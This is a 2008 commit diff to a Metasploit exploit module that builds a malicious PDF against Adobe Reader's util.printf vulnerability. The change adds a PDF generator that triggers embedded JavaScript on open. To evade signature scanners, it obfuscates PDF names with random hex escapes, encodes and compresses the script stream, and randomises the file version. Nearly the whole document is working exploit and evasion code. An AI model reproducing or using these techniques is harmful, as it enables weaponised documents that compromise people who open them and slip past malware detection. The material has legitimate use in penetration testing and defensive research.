updated with some awesome stuff from Didier Stevens.

git-svn-id: file:///home/svn/framework3/trunk@6006 4d416f70-5f16-0410-b530-b9f4589650da
2008-12-08 13:16:54 +00:00 · 2008-12-08 13:16:54 +00:00 · 1485e0564e
parent e00cf42f9d
commit 1485e0564e
1 changed files with 82 additions and 67 deletions
--- a/modules/exploits/windows/fileformat/adobe_utilprintf.rb
+++ b/modules/exploits/windows/fileformat/adobe_utilprintf.rb
@ -6,6 +6,7 @@
 ###

 require 'msf/core'
+require 'zlib'

 class Metasploit3 < Msf::Exploit::Remote

@ -20,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					entry, an attacker may be able to execute arbitrary code.
 			},
 			'License'        => MSF_LICENSE,
-			'Author'         => [ 'MC' ], 
+			'Author'         => [ 'MC', 'Didier Stevens <didier.stevens[at]gmail.com>' ], 
 			'Version'        => '$Revision:$',
 			'References'     => 
 				[
@ -58,13 +59,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Make some nops
 		nops    = Rex::Text.to_unescape(make_nops(4))

-		# Randomize PDF version?
-		ver = 1 + rand(2)
-		
-		build = 1 + rand(5)
-
-		x = ver.to_s + "." + build.to_s
-
 		# Randomize variables
 		rand1  = rand_text_alpha(rand(100) + 1) 
 		rand2  = rand_text_alpha(rand(100) + 1) 
@ -96,69 +90,90 @@ class Metasploit3 < Msf::Exploit::Remote
 					|
 		
 		# Create the pdf
-		pdf =  "\x25\x50\x44\x46\x2d" + x + "\x0a\x0a\x31\x20\x30\x20\x6f\x62"
-		pdf << "\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54\x79\x70\x65\x20\x2f\x43\x61\x74"
-		pdf << "\x61\x6c\x6f\x67\x0a\x20\x2f\x4f\x75\x74\x6c\x69\x6e\x65\x73\x20"
-		pdf << "\x32\x20\x30\x20\x52\x0a\x20\x2f\x50\x61\x67\x65\x73\x20\x33\x20"
-		pdf << "\x30\x20\x52\x0a\x20\x2f\x4f\x70\x65\x6e\x41\x63\x74\x69\x6f\x6e"
-		pdf << "\x20\x37\x20\x30\x20\x52\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a"
-		pdf << "\x0a\x0a\x32\x20\x30\x20\x6f\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54"
-		pdf << "\x79\x70\x65\x20\x2f\x4f\x75\x74\x6c\x69\x6e\x65\x73\x0a\x20\x2f"
-		pdf << "\x43\x6f\x75\x6e\x74\x20\x30\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62"
-		pdf << "\x6a\x0a\x0a\x33\x20\x30\x20\x6f\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f"
-		pdf << "\x54\x79\x70\x65\x20\x2f\x50\x61\x67\x65\x73\x0a\x20\x2f\x4b\x69"
-		pdf << "\x64\x73\x20\x5b\x34\x20\x30\x20\x52\x5d\x0a\x20\x2f\x43\x6f\x75"
-		pdf << "\x6e\x74\x20\x31\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a"
-		pdf << "\x34\x20\x30\x20\x6f\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54\x79\x70"
-		pdf << "\x65\x20\x2f\x50\x61\x67\x65\x0a\x20\x2f\x50\x61\x72\x65\x6e\x74"
-		pdf << "\x20\x33\x20\x30\x20\x52\x0a\x20\x2f\x4d\x65\x64\x69\x61\x42\x6f"
-		pdf << "\x78\x20\x5b\x30\x20\x30\x20\x36\x31\x32\x20\x37\x39\x32\x5d\x0a"
-		pdf << "\x20\x2f\x43\x6f\x6e\x74\x65\x6e\x74\x73\x20\x35\x20\x30\x20\x52"
-		pdf << "\x0a\x20\x2f\x52\x65\x73\x6f\x75\x72\x63\x65\x73\x20\x3c\x3c\x0a"
-		pdf << "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x50\x72"
-		pdf << "\x6f\x63\x53\x65\x74\x20\x5b\x2f\x50\x44\x46\x20\x2f\x54\x65\x78"
-		pdf << "\x74\x5d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
-		pdf << "\x2f\x46\x6f\x6e\x74\x20\x3c\x3c\x20\x2f\x46\x31\x20\x36\x20\x30"
-		pdf << "\x20\x52\x20\x3e\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
-		pdf << "\x20\x20\x3e\x3e\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a"
-		pdf << "\x35\x20\x30\x20\x6f\x62\x6a\x0a\x3c\x3c\x20\x2f\x4c\x65\x6e\x67"
-		pdf << "\x74\x68\x20\x35\x36\x20\x3e\x3e\x0a\x73\x74\x72\x65\x61\x6d\x0a"
-		pdf << "\x42\x54\x20\x2f\x46\x31\x20\x31\x32\x20\x54\x66\x20\x31\x30\x30"
-		pdf << "\x20\x37\x30\x30\x20\x54\x64\x20\x31\x35\x20\x54\x4c\x20\x28"
-		pdf << "\x65"
-		pdf << "\x61\x6d\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a\x36\x20\x30\x20\x6f"
-		pdf << "\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54\x79\x70\x65\x20\x2f\x46\x6f"
-		pdf << "\x6e\x74\x0a\x20\x2f\x53\x75\x62\x74\x79\x70\x65\x20\x2f\x54\x79"
-		pdf << "\x70\x65\x31\x0a\x20\x2f\x4e\x61\x6d\x65\x20\x2f\x46\x31\x0a\x20"
-		pdf << "\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x20\x2f\x48\x65\x6c\x76\x65"
-		pdf << "\x74\x69\x63\x61\x0a\x20\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20"
-		pdf << "\x2f\x4d\x61\x63\x52\x6f\x6d\x61\x6e\x45\x6e\x63\x6f\x64\x69\x6e"
-		pdf << "\x67\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a\x37\x20\x30"
-		pdf << "\x20\x6f\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54\x79\x70\x65\x20\x2f"
-		pdf << "\x41\x63\x74\x69\x6f\x6e\x0a\x20\x2f\x53\x20\x2f\x4a\x61\x76\x61"
-		pdf << "\x53\x63\x72\x69\x70\x74\x0a\x20\x2f\x4a\x53\x20\x28"
-		pdf << script
-		pdf << "\x0a\x0a\x0a"
-		pdf << "\x29\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a\x78\x72\x65"
-		pdf << "\x66\x0a\x30\x20\x38\x0a\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"
-		pdf << "\x20\x36\x35\x35\x33\x35\x20\x66\x0a\x30\x30\x30\x30\x30\x30\x30"
-		pdf << "\x30\x31\x30\x20\x30\x30\x30\x30\x30\x20\x6e\x0a\x30\x30\x30\x30"
-		pdf << "\x30\x30\x30\x30\x39\x38\x20\x30\x30\x30\x30\x30\x20\x6e\x0a\x30"
-		pdf << "\x30\x30\x30\x30\x30\x30\x31\x34\x37\x20\x30\x30\x30\x30\x30\x20"
-		pdf << "\x6e\x0a\x30\x30\x30\x30\x30\x30\x30\x32\x30\x38\x20\x30\x30\x30"
-		pdf << "\x30\x30\x20\x6e\x0a\x30\x30\x30\x30\x30\x30\x30\x34\x30\x30\x20"
-		pdf << "\x30\x30\x30\x30\x30\x20\x6e\x0a\x30\x30\x30\x30\x30\x30\x30\x35"
-		pdf << "\x30\x37\x20\x30\x30\x30\x30\x30\x20\x6e\x0a\x30\x30\x30\x30\x30"
-		pdf << "\x30\x30\x36\x32\x31\x20\x30\x30\x30\x30\x30\x20\x6e\x0a\x74\x72"
-		pdf << "\x61\x69\x6c\x65\x72\x0a\x3c\x3c\x0a\x20\x2f\x53\x69\x7a\x65\x20"
-		pdf << "\x38\x0a\x20\x2f\x52\x6f\x6f\x74\x20\x31\x20\x30\x20\x52\x0a\x3e"
-		xrefPosition = pdf.length
-		pdf << "\x3e\x0a\x73\x74\x61\x72\x74\x78\x72\x65\x66\x0a" + xrefPosition.to_s()
-		pdf << "\x0a\x25\x25\x45\x4f\x46\x0a"
+		pdf = make_pdf(script)

 		print_status("Creating '#{datastore['FILENAME']}' file...") 

 		file_create(pdf)
 	end

+	def RandomNonASCIIString(count)
+		result = ""
+		count.times do
+			result << (rand(128) + 128).chr
+		end
+		result
+	end
+	
+	def ioDef(id)
+		"%d 0 obj" % id
+	end
+
+	def ioRef(id)
+		"%d 0 R" % id
+	end
+
+	#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
+	def nObfu(str)
+		result = ""
+		str.scan(/./u) do |c|
+			if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
+				result << "#%x" % c[0]
+			else
+				result << c
+			end
+		end
+		result
+	end
+	
+	def ASCIIHexWhitespaceEncode(str)
+		result = ""
+		whitespace = ""
+		str.each_byte do |b|
+			result << whitespace << "%02x" % b
+			whitespace = " " * (rand(3) + 1)
+		end
+		result << ">"
+	end
+	
+	def make_pdf(js)
+
+		xref = []
+		eol = "\x0d\x0a"
+		endobj = "endobj" << eol
+    
+		# Randomize PDF version?
+		pdf = "%%PDF-%d.%d" % [1 + rand(2), 1 + rand(5)] << eol
+		pdf << "%" << RandomNonASCIIString(4) << eol
+		xref << pdf.length
+		pdf << ioDef(1) << nObfu("<</Type/Catalog/Outlines ") << ioRef(2) << nObfu("/Pages ") << ioRef(3) << nObfu("/OpenAction ") << ioRef(5) << ">>" << endobj
+		xref << pdf.length
+		pdf << ioDef(2) << nObfu("<</Type/Outlines/Count 0>>") << endobj
+		xref << pdf.length
+		pdf << ioDef(3) << nObfu("<</Type/Pages/Kids[") << ioRef(4) << nObfu("]/Count 1>>") << endobj
+		xref << pdf.length
+		pdf << ioDef(4) << nObfu("<</Type/Page/Parent ") << ioRef(3) << nObfu("/MediaBox[0 0 612 792]>>") << endobj
+		xref << pdf.length
+		pdf << ioDef(5) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(6) + ">>" << endobj
+		xref << pdf.length
+		compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))
+		pdf << ioDef(6) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
+		pdf << "stream" << eol
+		pdf << compressed << eol
+		pdf << "endstream" << eol
+		pdf << endobj
+		xrefPosition = pdf.length
+		pdf << "xref" << eol
+		pdf << "0 %d" % (xref.length + 1) << eol
+		pdf << "0000000000 65535 f" << eol
+		xref.each do |index|
+			pdf << "%010d 00000 n" % index << eol
+		end
+		pdf << "trailer" << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(1) << ">>" << eol
+		pdf << "startxref" << eol
+		pdf << xrefPosition.to_s() << eol
+		pdf << "%%EOF" << eol
+
+	end
+
 end